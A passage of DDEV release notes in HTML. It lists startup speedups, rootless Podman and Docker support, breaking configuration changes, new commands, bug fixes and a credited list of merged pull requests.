<li><strong>Faster <code>ddev start</code>:</strong> Reduced startup time by running post-healthcheck tasks concurrently, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonesrussell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonesrussell">@jonesrussell</a></li>
<li><strong>Faster <code>ddev stop</code>:</strong> Fixed a bug in the webserver startup script that added an unnecessary ~10-second delay</li>
<li><strong>MariaDB 12.3 LTS support</strong></li>
<li><strong>Podman and Docker rootless are no longer experimental:</strong> Both are now stable and ready for general use:
<ul>
<li><a href="https://docs.ddev.com/en/stable/users/install/docker-installation/#macos-podman-rootless" rel="nofollow">macOS (Podman rootless)</a></li>
<li><a href="https://docs.ddev.com/en/stable/users/install/docker-installation/#linux-docker-rootless" rel="nofollow">Linux/WSL2 (Docker rootless)</a></li>
<li><a href="https://docs.ddev.com/en/stable/users/install/docker-installation/#linux-podman-rootless" rel="nofollow">Linux/WSL2 (Podman rootless)</a></li>
</ul>
</li>
</ul>
<h2>Breaking Changes</h2>
<ul>
<li>Remove support for <code>XDG_CONFIG_HOME</code>, replaced by <code>DDEV_XDG_CONFIG_HOME</code>. Support for <code>~/.config/ddev</code> on Linux is unchanged. This change was needed because some IDEs, such as PhpStorm, don't always see <code>XDG_CONFIG_HOME</code> set in the terminal (see <a href="https://youtrack.jetbrains.com/projects/IJPL/issues/IJPL-1055/Load-interactive-shell-environment-variables-on-Linux" rel="nofollow">this issue</a>), which caused the IDE to recreate the <code>~/.ddev</code> directory repeatedly</li>
<li>Use stricter permissions for world-writable directories inside <code>ddev-webserver</code>. If you had <code>post-start</code> hooks that wrote to <code>/usr/local/bin</code>, update them to use <code>~/.local/bin</code> instead, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li>Move <code>N_PREFIX</code> from <code>/usr/local</code> to <code>/usr/local/n</code>. This shouldn't affect most people, unless you referenced a full path such as <code>/usr/local/bin/npm</code> - the new location is <code>/usr/local/n/bin/npm</code>, or simply use <code>npm</code> without a full path</li>
<li>Remove the <code>ddev dr</code> alias for <code>ddev drush</code>, since <code>dr</code> is now a built-in command for Drupal 11.4+</li>
</ul>
<h2>Features</h2>
<ul>
<li><a href="https://docs.ddev.com/en/stable/users/configuration/config/#nodejs_version" rel="nofollow">Node.js improvements</a>: preserve <code>nodejs_version</code> in <code>.ddev/config.yaml</code>, and install several Node.js versions with <code>n install &lt;version&gt;</code> inside the web container</li>
<li>Docker rootless on Linux no longer requires <code>no-bind-mounts</code>; disable it with <code>ddev config global --no-bind-mounts=false</code></li>
<li>Support the <a href="https://github.com/moby/moby/releases/tag/docker-v29.5.0">gvisor-tap-vsock</a> network driver in Docker rootless</li>
<li>Add new <a href="https://docs.ddev.com/en/stable/users/usage/commands/#dr" rel="nofollow"><code>ddev dr</code></a> command for Drupal 11.4+</li>
<li>Allow using Mutagen together with <code>ddev config global --use-hardened-images=true</code></li>
<li><code>ddev version</code> and <code>ddev config</code> now work even when Docker isn't running or is broken, and <code>ddev poweroff</code> shows progress output instead of appearing to hang</li>
<li>Improve <code>ddev list</code> and <code>ddev describe</code> layout on narrow terminals</li>
<li>Add OSC 8 terminal hyperlink support to <code>ddev list</code>, <code>ddev describe</code>, <code>ddev add-on list</code>, and <code>ddev add-on search</code></li>
<li>Show human-readable output when checking available disk space, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wolcen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wolcen">@wolcen</a></li>
<li>Always pull images when using <code>ddev start --no-cache</code></li>
<li>Respect the <code>COMPOSER_NO_BLOCKING</code> environment variable from the host in <code>ddev composer</code></li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/configuration/config/#docker_buildx_version" rel="nofollow"><code>ddev config global --docker-buildx-version</code></a> to specify which Docker Buildx version to use (advanced use only)</li>
<li>Respect <code>docker-buildx</code> installed via snap on Linux</li>
<li>Support Debian, Kali, and eLxr WSL2 distros in the Windows installer, and avoid installing <code>docker-ce</code> over an existing Docker Desktop <code>docker</code> binary</li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility-addon-update-checker" rel="nofollow"><code>ddev utility addon-update-checker</code></a> command for add-on maintainers</li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/extend/creating-add-ons/#interactive-actions" rel="nofollow"><code>#ddev-interactive</code></a> option for add-on actions, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/extend/custom-docker-services/#omitting-comddev-labels-from-a-service" rel="nofollow"><code>x-ddev.omit-ddev-labels</code></a> extension to skip <code>com.ddev.*</code> label injection for specific services</li>
<li>Support the Flatpak user binary for DBeaver on Linux, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nickchomey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nickchomey">@nickchomey</a></li>
<li>Add a <a href="https://docs.ddev.com/en/stable/users/quickstart/#drupal-drupal-12-head" rel="nofollow">quickstart for Drupal 12 (HEAD)</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a></li>
<li>Add troubleshooting for <a href="https://docs.ddev.com/en/stable/users/topics/hosting/#lets-encrypt-errors" rel="nofollow">Let's Encrypt certificate failures</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonpugh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonpugh">@jonpugh</a></li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>Windows installer: fix installation on WSL2 Ubuntu 26.04, which previously failed due to the deprecated <code>wslu</code> package</li>
<li>Suppress 404 logs for <code>favicon.ico</code> and <code>robots.txt</code>; in some cases these caused Nginx to run a PHP script twice</li>
<li>Prevent recursion in global web command wrappers</li>
<li>Use the correct <code>settings.ddev.php</code> for each Drupal version</li>
<li>Fix a bug where <code>.ddev/apache/apache-site.conf</code> went missing when using a custom Nginx config</li>
<li>Detect a missing <code>docker</code> CLI, which is required when using Mutagen</li>
<li>Limit the <code>ENV HOME=""</code> workaround for MySQL 8.x to the database context only</li>
<li>Podman and macOS: restrict the <code>keep-id</code> userns setting to Linux only</li>
<li>Use the <code>nodejs_version</code> set during the <code>ddev-webserver</code> image build; if you installed global <code>npm</code> packages in <code>post-start</code> hooks, move them to <a href="https://docs.ddev.com/en/stable/users/extend/customizing-images/#adding-extra-dockerfiles-for-webimage-and-dbimage" rel="nofollow">extra Dockerfiles</a> instead</li>
<li>Use wrapper scripts in <code>ddev-dbserver</code> to avoid <code>mysql</code> deprecation warnings with MariaDB 11.x+</li>
<li>Warn when the <code>CAROOT</code> environment variable is set but the mkcert CA files (needed for HTTPS in your browser) are inaccessible</li>
<li>Normalize <code>OSTYPE</code> detection on Linux, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mikee-3000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mikee-3000">@Mikee-3000</a></li>
<li>Avoid double-sourcing bashrc configuration in <code>ddev ssh</code></li>
<li>Skip OS-generated metadata files (<code>.DS_Store</code>, <code>Thumbs.db</code>, <code>desktop.ini</code>) during custom-config detection and in <code>.ddev/.gitignore</code></li>
<li>Restore path autocompletion for <code>ddev add-on get</code></li>
<li>Don't prompt to run <code>ddev poweroff</code> after updating <code>ddev-ssh-agent</code></li>
<li>Fix a case typo in <code>ddev sequelace</code> so Sequel Ace is detected on case-sensitive macOS filesystems, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mficzel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mficzel">@mficzel</a></li>
</ul>
<h2>Internal Changes</h2>
<ul>
<li>Migrate <a href="https://docs.ddev.com/" rel="nofollow">DDEV documentation</a> from <a href="https://squidfunk.github.io/mkdocs-material/" rel="nofollow">Material for MkDocs</a> to <a href="https://zensical.org/" rel="nofollow">Zensical</a></li>
<li>Upgrade Bubble Tea (<code>ddev tui</code>) to v2</li>
<li>Add light/dark/system preference variants for the <a href="https://docs.ddev.com/en/stable/developers/brand-guide/" rel="nofollow">brand logo</a></li>
<li>Remove automated testing on macOS Intel; macOS amd64 binaries are still built and distributed, only CI testing on Intel hardware is removed</li>
<li>Add automated testing for macOS Podman rootless</li>
<li>Improve the test embargo system for Go, Bats, and CI workflows; tests can now be <a href="https://docs.ddev.com/en/stable/developers/maintainers/#skipping-tests" rel="nofollow">skipped</a> when needed</li>
<li>Add custom GitHub workflows to run tests on branches without opening a PR</li>
<li>Rework local HTTP test helpers for clearer failure output</li>
<li>Remove the build step for the Docker image used in <code>ddev auth ssh</code></li>
<li>Bump all Go dependencies</li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.4.22 and 8.5.7</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>test: Reenable Drupal 12 bats test (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308873453" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8346" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8346/hovercard" href="https://github.com/ddev/ddev/pull/8346">#8346</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308873453" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8346" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8346/hovercard" href="https://github.com/ddev/ddev/pull/8346">#8346</a></li>
<li>chore(claude): fix PreToolUse hook matcher for git commit static analysis (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304236248" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8345" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8345/hovercard" href="https://github.com/ddev/ddev/pull/8345">#8345</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304236248" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8345" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8345/hovercard" href="https://github.com/ddev/ddev/pull/8345">#8345</a></li>
<li>docs(add-ons): Minor updates to creating-add-ons.md by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311162289" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8347" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8347/hovercard" href="https://github.com/ddev/ddev/pull/8347">#8347</a></li>
<li>perf: combined startup time optimizations, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3892114614" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8096" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8096/hovercard" href="https://github.com/ddev/ddev/issues/8096">#8096</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonesrussell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonesrussell">@jonesrussell</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3941786572" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8145" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8145/hovercard" href="https://github.com/ddev/ddev/pull/8145">#8145</a></li>
<li>fix(windows): remove wslu from installer, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276951921" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8326" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8326/hovercard" href="https://github.com/ddev/ddev/issues/8326">#8326</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335618741" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8351" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8351/hovercard" href="https://github.com/ddev/ddev/pull/8351">#8351</a></li>
<li>fix(webserver): replace phar.io/filippo.io links with GitHub releases, improve Dockerfile, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3794142159" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8012" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8012/hovercard" href="https://github.com/ddev/ddev/issues/8012">#8012</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337118936" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8352" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8352/hovercard" href="https://github.com/ddev/ddev/pull/8352">#8352</a></li>
<li>docs(quickstart): add a quickstart for Drupal 12 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344681076" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8357" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8357/hovercard" href="https://github.com/ddev/ddev/pull/8357">#8357</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344681076" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8357" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8357/hovercard" href="https://github.com/ddev/ddev/pull/8357">#8357</a></li>
<li>feat(docker): always pull images with <code>--no-cache</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349539661" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8363" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8363/hovercard" href="https://github.com/ddev/ddev/pull/8363">#8363</a></li>
<li>fix(download-images): pull webserver image, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231897705" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8304" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8304/hovercard" href="https://github.com/ddev/ddev/pull/8304">#8304</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344757488" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8358" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8358/hovercard" href="https://github.com/ddev/ddev/pull/8358">#8358</a></li>
<li>fix(start): use image digest for rebuild detection, fix rand and ssh-agent data races, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3941786572" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8145" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8145/hovercard" href="https://github.com/ddev/ddev/pull/8145">#8145</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345335786" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8359" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8359/hovercard" href="https://github.com/ddev/ddev/pull/8359">#8359</a></li>
<li>fix(test): skip TestCheckLiveConnectivityWithProject on Rancher/Colima/Lima, fix misleading WSL2 labels by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351827772" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8365" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8365/hovercard" href="https://github.com/ddev/ddev/pull/8365">#8365</a></li>
<li>docs(windows): add WSL2 installation step to Docker docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343533724" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8355" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8355/hovercard" href="https://github.com/ddev/ddev/pull/8355">#8355</a></li>
<li>chore: fix claude hooks and update agent docs [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359138300" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8370" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8370/hovercard" href="https://github.com/ddev/ddev/pull/8370">#8370</a></li>
<li>chore: remove macOS amd64 CI testing (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359689994" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8372" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8372/hovercard" href="https://github.com/ddev/ddev/pull/8372">#8372</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359689994" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8372" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8372/hovercard" href="https://github.com/ddev/ddev/pull/8372">#8372</a></li>
<li>fix(drupal): use configured project type for settings.php version selection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353481878" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8366" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8366/hovercard" href="https://github.com/ddev/ddev/pull/8366">#8366</a></li>
<li>ci: run golangci-lint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365231243" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8375" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8375/hovercard" href="https://github.com/ddev/ddev/pull/8375">#8375</a></li>
<li>docs(mutagen): explain how to reset to the default mode, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355654879" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8367" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8367/hovercard" href="https://github.com/ddev/ddev/issues/8367">#8367</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/silverham/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/silverham">@silverham</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355742321" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8368" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8368/hovercard" href="https://github.com/ddev/ddev/pull/8368">#8368</a></li>
<li>docs(configuration): Add <code>ddev config --database=&lt;database type&gt;:&lt;version&gt;</code> example command (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4382057472" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8387" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8387/hovercard" href="https://github.com/ddev/ddev/pull/8387">#8387</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/silverham/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/silverham">@silverham</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4382057472" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8387" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8387/hovercard" href="https://github.com/ddev/ddev/pull/8387">#8387</a></li>
<li>build: bump fuxingloh/multi-labeler from 4 to 5 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379236601" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8385" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8385/hovercard" href="https://github.com/ddev/ddev/pull/8385">#8385</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379236601" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8385" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8385/hovercard" href="https://github.com/ddev/ddev/pull/8385">#8385</a></li>
<li>docs: clarify --cleanup --name for single snapshot deletion (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4375346339" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8384" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8384/hovercard" href="https://github.com/ddev/ddev/pull/8384">#8384</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CallMeLeon167/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CallMeLeon167">@CallMeLeon167</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4375346339" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8384" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8384/hovercard" href="https://github.com/ddev/ddev/pull/8384">#8384</a></li>
<li>docs(add-ons): add real example for bats testing (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365579223" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8377" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8377/hovercard" href="https://github.com/ddev/ddev/pull/8377">#8377</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365579223" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8377" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8377/hovercard" href="https://github.com/ddev/ddev/pull/8377">#8377</a></li>
<li>fix(commands): normalize $OSTYPE detection for linux, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371984340" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8382" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8382/hovercard" href="https://github.com/ddev/ddev/issues/8382">#8382</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mikee-3000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mikee-3000">@Mikee-3000</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372014245" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8383" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8383/hovercard" href="https://github.com/ddev/ddev/pull/8383">#8383</a></li>
<li>docs: Add Xcode iOS simulator info (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359170507" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8371" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8371/hovercard" href="https://github.com/ddev/ddev/pull/8371">#8371</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jamesmacwhite/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jamesmacwhite">@jamesmacwhite</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359170507" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8371" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8371/hovercard" href="https://github.com/ddev/ddev/pull/8371">#8371</a></li>
<li>feat(utility): add <code>ddev utility addon-update-checker</code> command by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363864217" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8373" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8373/hovercard" href="https://github.com/ddev/ddev/pull/8373">#8373</a></li>
<li>fix(add-ons): autocomplete for path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365566102" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8376" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8376/hovercard" href="https://github.com/ddev/ddev/pull/8376">#8376</a></li>
<li>test(wsl2): fix TestHostDBPort by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400300129" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8391" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8391/hovercard" href="https://github.com/ddev/ddev/pull/8391">#8391</a></li>
<li>test(windows): fix TestUtilityAddonUpdateCheckerCmd, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363864217" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8373" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8373/hovercard" href="https://github.com/ddev/ddev/pull/8373">#8373</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4408413794" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8394" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8394/hovercard" href="https://github.com/ddev/ddev/pull/8394">#8394</a></li>
<li>docs(quickstart): Add description to Drupal Git clone example by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gitressa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gitressa">@gitressa</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4408464620" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8395" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8395/hovercard" href="https://github.com/ddev/ddev/pull/8395">#8395</a></li>
